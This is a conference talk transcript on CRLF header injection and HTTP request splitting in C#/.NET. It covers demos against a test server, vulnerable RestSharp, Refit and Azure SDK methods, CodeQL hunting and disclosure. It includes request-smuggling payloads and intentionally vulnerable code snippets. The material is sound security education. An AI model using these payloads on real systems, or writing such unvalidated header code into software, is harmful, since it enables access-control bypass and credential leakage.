Thank you, Stian. Does anybody have any questions for Stian about end-to-end supply chain security, or how some of this might apply to the SDLCs you're working in? Yes, Mr. Ingebretson, over there. You always sit as far away from me as you can.
You mentioned that GitHub didn't have some of these features that you wanted. What about the other Git vendors out there, like GitLab? Has anybody implemented more of this?
In terms of SHA-256 support, GitLab has experimental support that they added in August, so I guess that's a bit better. In terms of signed pushes, I don't think anybody has that. One thing GitHub does have is a private version of Sigstore: they basically run one Sigstore instance for all customers of GitHub, and you can use that for your attestations instead, just not publicly. The downside is that you can't do a full audit of the log when you use it.
Anybody else? I have a question: what do you think will be the main drivers for getting this stuff implemented in SDLCs? Is it companies trying to manage their own risk, or do we have standards coming, or audits of existing standards, that will look closer into a vendor's SDLC?
Sure. There's some EU regulation coming; maybe that will help. But for the smaller open source projects, I think it's about making it as easy as possible to do. That's what npm and Homebrew and PyPI and others are working on as well, and I think that's key. For companies, they're mostly going to do it internally, right? So it's not going to be visible in most cases.
All right. Anybody else? No? And you're also at the hardware hacking village, so people can find Stian there and ask him about hardware hacking or supply chains or any number of other topics. Thank you very much once again, Stian. Thank you.
All right, and moving on: we did get the shirts, as I mentioned, so if you ordered a shirt, or you're not sure whether you ordered a shirt, you can go check with Pineda; she's around downstairs. And we're actually ahead of schedule this afternoon. What is going on? Incredible. Do we wait or do we start? No, I think we just get going; nobody should feel like we're cutting into their break. No pressure. So we have Sofia Lindqvist on HTTP injection attacks. Take it away.
Thank you very much. So I'm Sofia, and I'm going to talk to you about HTTP header injections: "Splitting Headache". Really, my title should mention
request splitting, but I wasn't able to make as good a pun out of that, so header injections it is; we'll talk about those as well. A couple of words about myself: I started out doing a PhD in pure maths. Luckily, I came to my senses and realized that academia was not the place to be, definitely not in pure maths. Instead, I worked three years as a developer at Cisco, on the operating system that runs on carrier-grade routers around the world. Eventually, I made my way over to security testing and pen testing, which I've been doing for two years now; currently I'm at Binary Security. Here's a rough outline of what I'm going to talk about today. I like covering my bases, so first I'll go through the basics of the vulnerability we'll be talking about, then show you a demo of how things actually function. After that, I'll talk about hunting for this vulnerability in the wild, show you a real-world demo, and then talk a bit about things in Azure. If you already know all of this well, the first bit might be boring; you can wake up for the first demo. If you were present at Sikkerhetsfestivalen in August, where I gave a slightly shorter version of the same talk, then
you can wake up at around the second demo. Right, so let's start from the beginning, with a typical HTTP request. This is what happens if, in Firefox, I go to binarysecurity.no and click the About tab: my browser sends this HTTP request. Now, some of these headers are a bit long and annoying, so I'm going to shorten things a bit and say that this is what the request looked like; essentially the same thing. The first thing we need to understand is what's up with these funny symbols at the ends of the lines. This backslash-r backslash-n business is what we refer to as CRLF: two control characters, the first called carriage return and the second line feed, shortened CR and LF respectively, or CRLF for the combination. If you use Windows, for example, you might recognize this as the way to make a new line in Windows text documents. It's also the way HTTP/1.1 has decided to delimit the different parts of the request. To make it clear what's happening, I'll always explicitly write out the CRLFs in my requests, but I'll also add a visual newline to make things easier to read for us humans. OK. With that out of the way, here's our HTTP request again. The first line is what we refer to as the request line. It has
three parts. The first is the HTTP method, which in this case is GET. It could be GET, POST, DELETE, whatever, and it tells you what you're doing, basically. The second part is the path of the resource we're trying to access, in this case the About page. And the third part is the protocol version. For the purposes of this talk, we'll always be dealing with HTTP/1.1, because HTTP/2 does headers very differently and is not vulnerable to the attack we're talking about today. Luckily for us, most of the internet still lives in 2015 or whatever and speaks HTTP/1.1. Then we have these four lines, which are what we refer to as HTTP headers. Each header has two parts: a name, then a colon, then a value. And the way you end one header name-value pair and start the next is with the CRLF character sequence. I didn't say it earlier, but the reason I write that as backslash-r backslash-n is that in most programming languages, that's the escape sequence that actually produces these control characters. Finally, when you're done with all your HTTP headers, you have this single blank line, if you will, just a lone CRLF, which signifies that the header section is done. In some requests, you'd also expect to see an HTTP body after the header section, but for this talk we only ever really care about the headers, so let's pretend that once you've finished the header section, you're done with the request. OK, with that out of the way, we need to say a few more words about HTTP headers. The header name, the thing before the colon, may consist of any printable ASCII character except whitespace and the characters in this list here, brackets and the like. The value has slightly fewer restrictions: it may basically be any non-control ASCII character. Notably, both CR and LF, those special control characters, are banned in both places, the name and the value. And if you stop and think about it for a second, it kind of has to be like this: if the way I end one header name-value pair and start the next is CRLF, then things would be highly ambiguous if I could suddenly have CRLF within the value itself. I wouldn't be able to tell them apart. There's a slight asterisk here, which is the concept of line continuations, but we won't deal with that today.
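To make the wire format concrete, here is the example request written out with explicit CRLFs as a C# string (header values are shortened, and the exact set a browser sends will differ):

```csharp
// The shortened example request, with explicit CRLF (\r\n) delimiters,
// the way it actually travels on the wire.
var request =
    "GET /about HTTP/1.1\r\n" +      // request line: method, path, version
    "Host: binarysecurity.no\r\n" +  // header name-value pairs, one per CRLF
    "User-Agent: Firefox\r\n" +
    "Accept: text/html\r\n" +
    "Connection: keep-alive\r\n" +
    "\r\n";                          // lone CRLF: end of the header section
```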
Right. Anyone who's ever read a specification or an RFC, been given instructions for how something should work and tried to implement them, knows that no one ever implements anything correctly. Maybe a slight exaggeration. So let's instead take a look at what happens if I have an HTTP client or server that doesn't follow these rules properly. Here is a highly constructed example, where I have a server that's planning to make the following HTTP request: it's going to GET the About page of Binary Security, and it's going to include an HTTP header named Some-Header with a user-controllable value, whatever that means. So me, the malicious user here, figures: let's see what happens if I try to send CRLF characters into this header value. I might try inputting a value like this: "blah", then the CRLF characters, then something that looks like another valid header name-value pair. If I put this straight in place of the user-controllable placeholder, it will look something like the following; again, I've added visual newlines to make it obvious what's happening, but it's the CRLFs themselves that actually determine where a new header name-value pair starts. What has actually happened is that I've injected a whole new header that the server didn't originally intend to include. But we don't need to stop there; we can take this one step further. Instead of injecting just a header, let's inject a whole request. Returning to the same example, let's try inputting something like this: a value of "blah", then a CRLF to terminate that header name-value pair, then another CRLF which acts as the end of the request itself, followed by something that looks like a second well-formed HTTP request. Again, inputting that and adding some visual newlines to make it legible, and making it even clearer by adding a bit of space, what we see is that we end up with two completely valid HTTP requests. The second request, the one fetching the smuggled resource, is what we'd refer to as a smuggled request, and the technique is request splitting. We had a server here that intended to make a single request; me, the malicious user, made it make two requests instead.
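Before the demo, a hedged reconstruction of the two payloads just described (the header name and the smuggled path are illustrative):

```csharp
// 1) Header injection: end our own value, then start a brand-new header line.
var injectedHeader = "blah\r\nInjected-Header: it-works";

// 2) Request splitting: end the header line, end the whole request, then
//    append a second, attacker-chosen request. The server's own trailing
//    CRLFs are assumed to finish off the smuggled request.
var smuggledRequest =
    "blah\r\n" +                    // terminates the Some-Header line
    "\r\n" +                        // lone CRLF: terminates request one
    "GET /smuggled HTTP/1.1\r\n" +  // a second, well-formed request begins
    "Host: internal.site";
```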
With that out of the way, we are ready for our first demo. I've written up a bit of what's going on here, but we don't actually need to read that; it's just backup in case of technical issues. OK, so on the right-hand side here, I have a terminal where I've SSH'd to a server, set up in the quickest and dirtiest way possible, which is hosting various sites. Let's see if we have some access logs. The first page we have is an internal site, which, on the left-hand side, I'm trying to access from the internet. On the right-hand side, I can see from the access logs (here's my IP, if anyone wants to know it) that I'm trying to get this resource, and that it returns a status code of 403 Forbidden, which is also what we see on the left-hand side. This was expected, because this internal site is meant to be a resource you can only reach from localhost on the server itself. To make things more interesting, we have a second host as well. I have it here, nice: a page called basicdemo.site. To see what's going on there, we need to look at some different logs. Let's try that again. Here we see I'm accessing this page, getting the root resource, and it returns a status code of 200. OK. What this is actually doing under the covers, when I talk to basicdemo.site, is fetching an internal status page from this internal site (not pinging, fetching), and then it gives the return code back to me, the end user. So this one got a 200 OK back from the internal resource. To see what that looks like, we go back to the access logs for the internal site, and we see requests coming in from localhost itself. Now, this is going to get mighty confusing if we can't actually see the requests and the headers going in and out here, so I've attempted some bash magic, and we'll see if it works. If I now visit basicdemo.site, I get to see the requests being made. The first request made here is the one I'm making from the outside to basicdemo.site, with all the HTTP headers my browser adds for me. And that is then
internally making a secondary request to the status.html page of internal.site. Now, this in itself is not terribly interesting; we need some more ingredients for anything to happen here. This page also takes a query parameter. I think that's going to break... let's try it. It takes a second parameter, called name, and what it does when I make the request with name=Sofia is that, in the secondary request, it appends a custom header named X-Custom-Name. Let me move that up just in case. So we have this custom header here, with a value of Sofia. OK. As the malicious users we are, this is a prime target for attempting CRLF injection, because what I can see is that I, the end user, am inputting a user-controllable value here on the left-hand side, in the browser, and the server I'm talking to is putting my value into a request that it makes. So let's attempt CRLF injection. What I want to do is input something like the following; I don't know if you can see that at the back, so let me lift that up. I basically want a value like "Sofia", then a CRLF, then something else that looks like a valid header. To actually input this, we need to URL-encode things, and I've cheated, because I would typo it live. Let's see if we manage. Bringing that window up again, if I can: here is the request I'm making from the outside, and here is the secondary request being made to internal.site. We have the X-Custom-Name header, and we also have an injected header, with the value "it works". OK, so that is HTTP header injection in practice. Next, of course, as predicted, we'll do full request smuggling, or request splitting. What we now want is something like the following: a value, a CRLF to end that header, a CRLF to end the whole request, and then a second thing that looks like a fully formed HTTP request. Copying that in, moment of truth, let's see. Here is the first request I made; here is the expected status request; and then there is a third, rogue request down here, to the page admin.html on the internal site. That is the smuggled request in this case. And to prove to you that this isn't just my badly formatted logs, we can go back to the access logs for the internal site and see that, indeed, two actual requests were made: one to the status page, and one to the admin page below. All right. You are now all experts on request splitting through CRLF injection. You can do request splitting in many other ways as well; this is just one of many. I've shown you how to do it, but I haven't actually told
you why this is a security vulnerability, as opposed to just a stupid bug. So we should talk a bit about impact. The setup here is the following: we have a server that intends to make a single request, and the attacker causes it to make multiple. That's the very high-level view of what's going on. So what can we do with that? Well, first of all, we can use it to bypass internal access controls. We actually did exactly that in the first demo, because the internal site wasn't reachable from the internet; it was only reachable from localhost. But because my second request was made by the server itself, it was able to talk to the internal site. Equally, there's not really any reason why this internal site needed to be reachable on the internet at all; that was just so I could show you it existed. Really, you'd put it on an internal IP, but you can still reach it from the server making the requests. The second thing you might be able to do is bypass client authentication. In the typical modern world of complicated web applications, you'll have some kind of load balancer talking to a bunch of internal hosts, which all talk to each other, everyone doing stuff. And what you'll commonly see is that when internal services talk to each other, they include some kind of authorization, say an Authorization header in the HTTP requests. Now, me, from the outside, I don't know the key the internal services use to talk to each other; but if I go via the server that's planning to make the request, it will itself add the appropriate keys, and I'll be able to talk to resources I wouldn't otherwise be able to communicate with. If you're really lucky, there's something internal that records the incoming request; let's say there's some kind of comment functionality. What I do then is split my request in such a way that all the headers the server would add end up in the body and get stored in a comment. Then I go and read the comment, and I see: oh, cool, it's adding this Authorization header, and I've leaked the keys out of the server. Next: I haven't really spoken about the limitations of request splitting. I'm slightly limited in which hosts I can actually talk to, because my request goes through the same HTTP connection as the previous one. I'm not making two entirely separate requests, so I can't just go to, like, google.com; I have to speak to the same host as the first request. Same physical connection, whatever; doesn't matter. But if you have something internal that allows some kind of redirect, you can combine the two: your smuggled request goes to the thing that lets you redirect to the resource you actually want, and you might be able to escalate this into basically a full server-side request forgery. So hopefully I've convinced you that
this is a real vulnerability. Now, let's forget about what you'd actually do with it and go back to the theoretical side. Not really; we're actually going to do something. OK, so here's the plan. Let's pick something really specific in source code that allows CRLF injection, by which I mean some common pattern of vulnerable code that people actually write. Because if you can do CRLF injection, you can also do header injection and request splitting, as we just saw; or you might be able to, at least. And then we're going to search through all the open source repositories and packages and whatever
we can find out in the world, and we're going to see: do we find lots of bugs? And then we become famous, or get to speak at B-Sides, or both. OK. From this point onwards, we've specialized to C#, because why give yourself too broad a scope, right? The code you can see up on the screen here is actually the code used for the endpoint in my basic demo site, which you saw a little while ago. It isn't terribly interesting: it defines a URI to talk to for the status endpoint, talks to it, and then sends the status code back to the end user. The interesting bit is the if statement around the middle, which says that if you've specified the name query parameter, I want to add this extra X-Custom-Name header. And how do we do that? With a method named TryAddWithoutValidation. What's happening here is that you have a request object in C# with a headers object attached to it, and among the various ways to add headers, one is this method, which takes a name and a value. In this case, the name of the header is X-Custom-Name, and the value is, ironically, called name; I should probably have picked something else. And in a completely shocking turn of events, TryAddWithoutValidation does not do validation. That's not entirely true: it actually validates the name properly. It's just the second parameter, the value, where it says: yeah, yeah, give me any control characters you want, I'll kindly append them to my request. I might end up making multiple requests; I don't care, I'll just ship it out for you. Conveniently, TryAddWithoutValidation is quite a long name and doesn't exactly roll off the tongue, so if I go searching for it, I don't expect lots of false positives from other people implementing their own functions called TryAddWithoutValidation that I'd then have to filter out. I expect that 99% of the time, I'll be hitting the real C# function, the .NET library method.
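A paraphrased sketch of the demo endpoint's vulnerable pattern; this is not the exact demo source, and whether raw CR/LF actually reaches the wire depends on the .NET version and handler in use:

```csharp
using System.Net.Http;
using System.Threading.Tasks;

// A user-controlled query parameter flows into TryAddWithoutValidation,
// which checks the header *name* but not the *value*.
static async Task<int> GetStatusAsync(HttpClient client, string? name)
{
    var request = new HttpRequestMessage(HttpMethod.Get, "http://internal.site/status.html");
    if (name is not null)
    {
        // No CR/LF filtering on the value: a URL-decoded
        // "Sofia\r\nInjected: it-works" lands in the outgoing request.
        request.Headers.TryAddWithoutValidation("X-Custom-Name", name);
    }
    var response = await client.SendAsync(request);
    return (int)response.StatusCode; // relayed back to the end user
}
```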
OK, let's go searching. GitHub first. If you search GitHub for the string TryAddWithoutValidation and filter on C# code, there are roughly 20,000 hits, spread across 4,500 unique repositories. People do use this, shockingly. Initially, I didn't really understand why anyone would use this method, but that's another topic, I guess. Also, in the world of C# and .NET, we have access to much more than just the open source code, because if you have a binary, you can essentially just trivially decompile it. So let's also go and have a look at public NuGet packages. For those not super familiar with C# and .NET, NuGet is the main package manager. First of all, there are something like 700,000 publicly available NuGet packages, and you're able to get some metadata and stats for them. A lot of these are old; this has existed for a while. But for 380,000 of them, you get updated metadata, including things like download counts, and I figured anything that doesn't fall into that category I probably didn't need to look at. Out of these, I sorted by number of downloads, looked at the 5,000 most popular public NuGet packages, downloaded each of them, decompiled them, and did a string search for TryAddWithoutValidation. Out of those, there were 121 packages with hits. I haven't written the number down, but there are multiple hits per package, so the count of individual hits is higher than that: 121 unique packages, though. There's also quite a bit of overlap between these packages and the GitHub repos, because a lot of this is open source. Right. Out of all this, I checked something like 80 GitHub repositories and all 121 NuGet hits, for a total of around 200 different code bases. That sounds worse than it is, because a lot of them you can immediately dismiss: no, this isn't going to be vulnerable, it's just hard-coded strings being passed in, for example. That's very easy to exclude. OK. But you would hope that with all of these numbers (I do like numbers), we actually found something interesting. Over to the results. I've divided them into various categories. The first one is a bit sad, or at least not that interesting, and that is command-
line applications. We have the scenario where someone has written a command-line application that takes some kind of command-line arguments, and those arguments are somehow passed through and end up in TryAddWithoutValidation. That means that if you supply these control characters on the command line, you end up doing request splitting or whatever. The fundamental problem with this is that if I'm running a command-line application on my own machine, it's my own machine I'm tricking into making the second request. I don't need to do that; I can just go to my browser and make whatever request I was planning to make. So this is not all that interesting. There is an asterisk on that, though, because someone else might have gone and written a web server that takes some user input and, on the back end, calls this command-line application with my user-controllable input from the web, and then suddenly I'm doing request splitting on the server again. Now, aside from the fact that that is painful to search for, I also figured that if you're in that scenario, you're probably able to do worse things, like actual command injection. So this is not the main area to look at, and I've kind of just discounted all of these as not interesting. Then there's a second, even sadder category. You'd think that by sorting both the GitHub results and the NuGet results by number of downloads, or forks, or stars, or whatever metric you have, you'd only be looking at interesting packages or repos. It turns out NuGet has a lot of ancient packages with a lot of downloads. You can have packages that haven't been touched since 2016, which still reach the top 5,000 by download count, and which are full of vulnerabilities. And then you realize: OK, there's literally no one on the internet who uses this package anymore; it's fully deprecated and removed. So initially I got really excited about a couple of results in this category, and then realized, damn, no one's ever going to use this. OK, moving on. Then we have something a bit more interesting: the category of APIs and libraries that expose vulnerable methods. What
I mean by that is: I've gone and written some library or package that's going to help you do something else, and I have a public API, so I say, use this method to do my thing. But under the covers, I take the input you give to my API, it goes zoop, zoop, zoop, and it ends up in TryAddWithoutValidation. So now we're one step removed from TryAddWithoutValidation itself, and it's my API that's vulnerable. With TryAddWithoutValidation, it's kind of obvious from the name that you aren't being validated; but if I've made something like an AddHeader method, it's suddenly not so obvious anymore that you are vulnerable. We have two examples here: the packages RestSharp and Refit. Perhaps ironically, both of these are trying to do exactly the same thing: they are both libraries attempting to simplify interacting with REST APIs. There are a lot of packages doing this in .NET; I don't know if people really struggle with interacting with REST APIs or what's up here, but OK, I won't judge. And then we have a final category, which is the Microsoft and Azure SDKs. This is a bit painful because, well, first of all, anyone who's read Microsoft code knows this is painful. Second of all, depending on how your NuGet packaging is done, other NuGet packages will very often pull in some of these Azure and Microsoft libraries, and then you get a bunch of false positives, because you get hits for TryAddWithoutValidation in every single Microsoft SDK, which is pulled into every single package, so you get far more hits than you should. So out of those top 5,000 packages with 121 hits, that's not actually the real number: it's probably more like 20 real hits, and a hundred of them are just Microsoft showing up again and again and again. Let's talk about RestSharp. This is a screenshot from their own web page; in their own words, RestSharp is a simple REST and HTTP API client for .NET. Let's go and have a look at the documentation and see: how am I supposed to add a header to a
request? This is the documentation. I don't know if you can see it at the back, but essentially they give you three or four different ways to add a header to a request, and they have an example line here in the middle: you make a RestRequest, define a path, and then use this method called AddHeader, which takes two arguments, a name and a value, and that adds the header. Simple enough. Let's do a demo. Here is the code running in the next demo: I have another host on my demo server, which has this GetAsync endpoint, and what it does is take a query parameter named key and put it into this RestSharp method named AddHeader. The line with the second highlight here is essentially identical to the line from the documentation. Like, I haven't done anything dumb on purpose here, other than putting user-controllable input into it.
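A paraphrased sketch of that endpoint (per the talk, this applies to RestSharp 111 and earlier; version 112 fixed it):

```csharp
using RestSharp; // NuGet: RestSharp, versions up to 111.x affected per the talk
using System.Threading.Tasks;

// The documented AddHeader call, with user-controlled input; nothing
// deliberately dumb beyond that.
static async Task<int> CheckStatusAsync(string key)
{
    var client = new RestClient("http://internal.site");
    var request = new RestRequest("/status.html");
    request.AddHeader("X-Key", key); // e.g. "hi\r\nInjected: it-works"
    var response = await client.ExecuteAsync(request);
    return (int)response.StatusCode;
}
```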
So, let's see. We probably want that window; let's clear it. Here is my beautiful RestSharp example. It has this endpoint to check the server status. I messed up, because it takes a key parameter; hang on. OK. This code is doing the exact same thing as my other demo, it's just using the RestSharp library to do it instead of my own badly written C# code. Looking at the requests coming in on the right-hand side: I'm making a request to the server's GetAsync endpoint, and then the server is making a secondary internal request to internal.site/status.html, including this custom header, X-Key, with a value of "hi". OK, we know what's going to happen: we are going to attempt CRLF injection, using exactly the same payloads as previously. I'll just paste that in, URL-encoded. So here's my initial request; here's the second one. We have a key of "Sofia" (that should probably have been something else, like an actual key), and we have an injected header with the value "it works". Let me move that up. Cool. Let's do the full request smuggling; let's see if we have it here. Yep. Again, I'm using the exact same example as previously; the payload is literally identical. And what do we end up with? We end up with the first request, the second intended request, and the third smuggled request, to admin.html. OK. Now, what's bad here is that there is no way in RestSharp to add a header to an HTTP call without being vulnerable to this. There are, like, no safe header methods in this library. Now, you can argue: just don't put malicious stuff into my API and I won't do bad things; and I can see that point. Initially, when I found this, I wasn't quite sure what it really amounted to, because I hadn't actually found any properly vulnerable uses of it. I did a bunch of searching on GitHub for other people using RestSharp's methods, found some more libraries that are vulnerable in turn, and then I had to start searching for
does anyone use this library, and it all became very painful, and I didn't have a really clean example of "here's someone who's vulnerable because of you guys". I mentioned that I gave a similar talk at Sikkerhetsfestivalen in August, slightly shorter than this one, where I showed this same demo, and afterwards I figured: OK, now that I've spoken about this, I should probably actually report it. Which I did. And then, ironically, it turns out they did take it seriously, so it got a CVE. I guess I accidentally dropped a zero-day at my last talk. We'll see if there are any accidental zero-days today; I think probably not, but we'll see. They also fixed it pretty much immediately, and it is fixed from RestSharp version 112 onwards. Side note: what is going on with the RestSharp version numbering? I don't know how you get to 112 major versions. So yes: 111 and earlier are vulnerable, and the demo was done on version 111. Let me just check the time. OK. Let's have a look at Refit as well. Refit, in their own words, is the automatic type-safe REST library for .NET Core, Xamarin, and .NET. That sounds very similar to the description of RestSharp, and indeed it's trying to solve the exact same problem. I won't do a demo of this, because it's pretty much identical, but I'll show you what the code would look like in the Refit case. This one I also reported, at the same time as RestSharp. They eventually got around to doing a fix, which they pushed to the main branch; but they haven't released it, and it's been sitting there for about a month. I posted a comment two weeks ago on the GitHub security report thingy, whatever it's called; they haven't answered. I don't know if they plan on doing anything, or on actually making a new release. Who knows. For the time being, don't use Refit for anything critical, I guess. All right. Now, over to something fun. Let's talk about Azure. There's an Azure SDK for all the big programming languages, and the idea is to
help you interact with Azure resources and management and whatnot from your own code. In the .NET case, this is open source; I guess it is for most of the languages. And the repo is called azure-sdk-for-net. Because this whole thing started with a code search, we are of course going to do a code search; it's not as if anyone has looked at Microsoft before. This repo is massive: there are 1,400 results for this term, spread across 84 files. I did look at more results than this overall, but those were way quicker to go through, because you have smaller code bases with a lot of false hits that are easy to exclude. Here, following any one of these hits through to see what code actually ends up inside this method is an absolute pain. I had to learn to use better tools. Enter CodeQL. CodeQL is a semantic code analysis tool, which means, I guess, that you hook it into your build system and it has actual knowledge of how your code works: what talks to what, what belongs together, that kind of thing. That's not a great explanation, but what's useful here is that it has the concepts of sources, sinks, and flows. A source, in my case, is basically any argument to a public method in a public class, a.k.a. a public API. And a sink is the second argument to TryAddWithoutValidation, i.e. the value, the thing that's vulnerable to CRLF injection. This is my attempt at writing the CodeQL for that sink. It's the first time I actually wrote any CodeQL, so it might be completely wrong, but it did do what it was supposed to do. And the idea with flows is that if you define the sources and the sinks, CodeQL will tell you all the sources and sinks that link up. It says: if you start with this argument in this API, it goes into this parameter, which is put into this function call, which defines this new attribute, which goes into this other function call, which ends up as the second argument to TryAddWithoutValidation. CodeQL is much better at doing this than I am manually. So what did we find? We found various things. First of all, there are 19 public methods in the public API of the Azure .NET SDK that take an argument named customHeaders. Custom headers are what they sound like: a dictionary mapping a header name to a list of header values, which are supposed to be added to some request. There are also 10 public methods that take an argument named ifMatch, which is put into a header of the same name, and six public methods that take an argument named xMsSnapshot, which is put into a header of the
same name. And unsurprisingly, because this is this talk, all of these are vulnerable to CRLF injection. That sounds pretty bad: what, 35 vulnerable methods? So I figured: right, I'm going out on the internet, I'm going to find everyone who's using this, and I'm going to just, like, hack everyone. We have lots of vulnerable APIs; and no one uses any of these APIs. Nobody. Well, I haven't actually checked absolutely everything, so a slight asterisk there. So what's going on here? Here's an example, which it's unclear whether you can actually read. On the left-hand side is the code from the SDK repository: one of these vulnerable methods, named GetImmutabilityPolicyWithHttpMessagesAsync, which takes an argument named customHeaders, which is vulnerable. The code is on the left; on the right-hand side is the Google search for the name of this method, in quotes. There's exactly one hit on Google, which is the Microsoft Learn documentation for this method. Now, there should be more hits, because this is on GitHub, but I don't know how Google works, apparently. If you actually click into this Microsoft Learn article, you realize that this is part of the legacy API. And indeed, looking at a few more methods, they are all within the legacy API. Some of them seem to be more common than this one; I took the least useful one on purpose, because I've learned from dropping zero-days previously. You have to be a tiny bit careful. If you go into the documentation, you see this "Azure SDK for .NET legacy" banner. But I still didn't quite understand what was going on here. In particular, what is up with these custom headers? If I'm trying to, I don't know, upload a file to my Azure container, when do I ever need custom headers? What is the use case? So I tried a bit of Googling, and I also noticed that all the methods taking this customHeaders argument had names ending in WithHttpMessagesAsync, which is a very specific kind of suffix. The first hit on Google for just "what is WithHttpMessagesAsync" is someone asking my exact
question, on the very repository I'm looking at. The issue had been closed, but without a satisfactory explanation, so I still didn't quite understand what was going on. Searching further, there are a bunch of Stack Exchange and Stack Overflow threads where people ask basically the same question. You definitely can't read this one, but here someone is asking specifically about the Microsoft Azure Face API: they're saying there's a method named GetAsync and a method named GetWithHttpMessagesAsync; why do both exist, and what is going on? No good answers. Searching a bit more eventually pointed me to a second repository, named AutoRest. The AutoRest repository also lives in the Azure organization on GitHub, and looking a bit closer at the SDK repository, what's happened is that all of the vulnerable code I found has been generated by this AutoRest tool. AutoRest goes and gets the REST specification from yet a third repository, generates the code, and checks it in to the SDK repository. So my hypothesis was: aha, it's this AutoRest thing that's generating vulnerable methods. I looked in that repository and found some example output that had TryAddWithoutValidation and was vulnerable. I'm like, oh yes, nice, I'm getting somewhere. Then I re-generated that same example, and it's not vulnerable. So what's happened is that there's an older version of AutoRest that generates vulnerable code, and it doesn't do it anymore. It has generated a bunch of vulnerable Azure methods in the past, but it's probably not doing it any longer. So all of this amounts to... I don't know what. Right. Depending on how we are for time... how are we for time? OK, then I'll do one more demo here at the end. Now, I've gone and picked another really obscure method, so I don't do anything bad here live. There's a method named Microsoft.Azure.Management.Storage's BlobContainersOperationsExtensions.GetImmutabilityPolicyAsync; so if you're using that in your code base, watch out. Here's the documentation from Microsoft. You can't see it at the back, but it takes a parameter named
ifmatch, and if match is vulnerable to CRLF injection. So I prepared this demo yesterday evening at about 11pm. So we'll see how understandable this actually is. I have opened burp here and put the font size to 24 so that you can read the requests, hopefully. That request wasn't interesting. I realised I didn't actually show you the code. So here is what we are doing. I went to chat GPT and I said make me some example code which uses super long method. It made me some code, and I changed it around so that I have a command line application which takes one argument. And this argument it puts into the if match value of this call to get immutability policy
async. So that's all we've got. So let's see. We've got this get immutability policy async.exe on the right-hand side. I'm going to pass it a value of hello b-sides. It's going to crash because it's a live demo. Let's find out. No, it didn't. Okay. Cool. Let's go, I'm sending this through a proxy because I didn't have time to think of a better way to view the request. So on the left-hand side here, you can see the request it's making to this beautiful endpoint in Azure. And here we can see the if match header has my value hello bsites. Okay, you all know what's going to happen. Let's try to inject a header. Side note, to
Side note: to put CRLF characters into a string in PowerShell, you have to use that funny backtick escape, `r`n, not backslash. I hadn't seen that before; I had to Google it. Let's see what request we made. We made the If-Match header with "hello bsides", and we have an injected header. All right. We'll do the third one. Let's see if we get to smuggle a whole request. This is going to look weird in my proxy here because it's all going through the same connection. But we have a first request which is properly terminated, and we have a second, smuggled request. It's scrolled just far enough down that I haven't leaked my whole bearer token, but I have shown you that the Authorization header ends up in the second request, which potentially makes this pretty nice, actually, because I can go and interact with any Azure resource I want, and this code is going to give me the proper authorization headers for that.
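A payload along these lines produces that effect (my reconstruction of the general shape of the demo input, not the exact string used):

```csharp
// Reconstruction of the general shape of a request-smuggling payload,
// not the exact demo input. The injected CRLFs terminate the first
// request, then start a second one; any headers the client appends
// after If-Match (such as Authorization) land on the smuggled request.
string payload =
    "hello bsides\r\n" +                    // legitimate-looking If-Match value
    "Content-Length: 0\r\n" +               // close out the first request's headers
    "\r\n" +                                // blank line: first request ends here
    "GET /anything-i-like HTTP/1.1\r\n" +   // smuggled second request begins
    "Host: management.azure.com";           // no trailing CRLF, so the client's
                                            // remaining headers attach to this request
```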
Now, this is running client-side, so this is the "dumb" vulnerability I spoke about initially. The idea here is: imagine someone had this code on a server, not me on my machine. All right. Do we have anything more? We have some conclusions. Excellent. Starting this project, I was hoping that what I would find was a bunch of vulnerable, I don't know, reverse proxies or load balancers or whatever, where I could just show you nicely in a web view: hey, I go to this page, and this endpoint is vulnerable to CRLF injection, and it exists in the wild.
What I found in reality was some library that uses some library that uses a vulnerable method, and all my examples are on my own code, which is a bit sad. But I mean, they're still real vulnerabilities, obviously. In fact, there's a CVE, so it's very much real. The main thing to learn here is just: be very careful with user-controllable input. This you already knew if you are here. But in the case of, for example, RestSharp, like I was saying initially: if I'm calling TryAddWithoutValidation, I'm not very surprised when there's no validation. But when I'm calling RestSharp's AddHeader method, and there's nothing in the documentation about CRLFs or security or whatever, it doesn't necessarily occur to me that I need to be extra careful. And if you put this a couple of layers out, like you have a library which uses that, and another library which uses that again, then it's beginning to be really not obvious that this would be vulnerable. So just always be extra careful, especially if you don't know what the library is doing.
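If you do control the call site, a minimal defensive pattern (my own sketch, not something from RestSharp or the Azure SDK) is to reject CR and LF before a value ever reaches a header API:

```csharp
// Minimal defensive sketch: validate user input before it reaches any
// header-setting API. Throwing is safer than silently stripping, since
// stripped input may still mean something the caller didn't intend.
using System;

static class HeaderGuard
{
    public static string RequireHeaderSafe(string value)
    {
        if (value.IndexOfAny(new[] { '\r', '\n' }) >= 0)
            throw new ArgumentException("Header value must not contain CR or LF.");
        return value;
    }
}

// Usage, e.g. before RestSharp's AddHeader or any pass-through parameter:
//   request.AddHeader("If-Match", HeaderGuard.RequireHeaderSafe(userInput));
```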
We got a CVE, so that's cool, and that's fixed. We got a fix in Refit, which may or may not be released yet. Who knows about Azure? Someone should probably actually be looking at the AutoRest and azure-rest-api-specs repositories. We'll see if I ever have the time to do that. And that's it. Thank you very much.
Thank you. Do we have any questions for Sophia? Why couldn't you save the 0-day for us? Maybe next year. Maybe next year. Just kidding. We support responsible disclosure. Maybe GetImmutabilityPolicyAsync gets a CVE.
What led you to focus on this area? At Binary Security, we have a markdown document called research.md. Someone had pasted into that document: "check out TryAddWithoutValidation, it's vulnerable to CRLF injection". And I ran with it. Fair enough. I kind of had the impression that the HTTP response injection stuff was... I remember hearing about that a long time ago, and I was like, that's old-school stuff; now we have to worry about V8 type confusion and map confusion. But it seems like even though we get the new vulnerabilities, the old ones are still kind of there. Oh yes.
Well, thank you very much. Are you here for the rest of the event? Fantastic. Thank you so much. Sophia, let's have a big round of applause.
That's a break. That is a wrap for the stream as well. So for anybody joining us online, thank you so much. Hope you enjoyed it. And please feel free to join us in person next time.